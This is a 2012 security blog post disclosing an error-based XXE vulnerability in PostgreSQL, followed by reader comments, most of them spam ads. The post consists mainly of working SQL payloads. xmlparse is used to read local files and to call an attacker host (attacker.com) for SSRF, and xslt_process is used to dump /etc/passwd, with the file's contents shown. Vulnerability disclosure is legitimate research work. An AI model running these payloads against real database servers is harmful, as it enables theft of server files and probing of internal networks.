пятница, 1 июня 2012 г.

PostgreSQL (all) error-based XXE 0day

Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
Classical XXE from XSLT transformation found.
Reading any data are possible also:

SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
 <?xml version="1.0"?>
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

(1 row)

17 комментариев:

  1. I'd like to notice that xslt_process is from xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.

    PS. That's why I wasn't able to discover this file-reading during phdays =)

    [1] http://www.postgresql.org/docs/9.1/static/xml2.html

  2. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ mua hộ hàng mỹ với các mặt hàng từ pandora úc hay từ web ebay việt nam cùng với bảng giá gửi hàng đi mỹ uy tín, giá rẻ.

  3. On the drawback the Setup HP Officejet 3830 Printer 123.hp.com/oj3830 has no Ethernet for wired systems and the manual page turning for the twofold side printing.

  4. It is important to seek statistics coursework writing services and statistics essay writing services since students find help when they visit Business Statistics Writing Services.

  5. If you found any login related issue in your Quickbooks software, you can download Quickbooks Tool Hub which is the hub of all necessary tools which are used to diagnose issues. It can fix all minor and major issues.